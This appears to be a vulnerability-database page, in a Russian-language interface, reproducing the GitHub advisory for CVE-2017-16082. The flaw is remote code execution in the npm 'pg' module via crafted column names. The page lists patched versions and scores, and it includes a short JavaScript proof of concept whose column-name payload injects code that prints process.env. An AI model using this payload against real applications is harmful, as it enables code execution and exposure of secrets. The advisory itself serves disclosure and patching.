exploitDog

GHSA-wc9v-mj63-m9g5

Опубликовано: 24 июл. 2018

Источник: github

Github: Прошло ревью

CVSS3: 9.8

Описание

Remote Code Execution in pg

Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable:

The application executes unsafe, user-supplied sql which contains malicious column names.
The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

const { Client } = require('pg') const client = new Client() client.connect() const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"` client.query(sql, (err, res) => { client.end() })

Recommendation

Version 2.x.x: Update to version 2.11.2 or later.
Version 3.x.x: Update to version 3.6.4 or later.
Version 4.x.x: Update to version 4.5.7 or later.
Version 5.x.x: Update to version 5.2.1 or later.
Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )
Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )

Ссылки

Пакеты

Наименование

pg

npm

Затронутые версииВерсия исправления

< 2.11.2

2.11.2

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 3.0.0, < 3.6.4

3.6.4

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 4.0.0, < 4.5.7

4.5.7

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 5.0.0, < 5.2.1

5.2.1

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 6.0.0, < 6.0.5

6.0.5

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 6.1.0, < 6.1.6

6.1.6

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 6.2.0, < 6.2.5

6.2.5

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 6.3.0, < 6.3.3

6.3.3

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 6.4.0, < 6.4.2

6.4.2

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 7.0.0, < 7.0.2

7.0.2

Наименование

pg

npm

Затронутые версииВерсия исправления

>= 7.1.0, < 7.1.2

7.1.2

EPSS

Процентиль: 99%

0.70815

Высокий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-94

Связанные уязвимости

CVE-2017-16082

CVSS3: 9.8

ubuntu

больше 7 лет назад

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

CVE-2017-16082

CVSS3: 9.8

nvd

больше 7 лет назад

A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.

CVE-2017-16082

CVSS3: 9.8

debian

больше 7 лет назад

A remote code execution vulnerability was found within the pg module w ...

EPSS

Процентиль: 99%

0.70815

Высокий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-94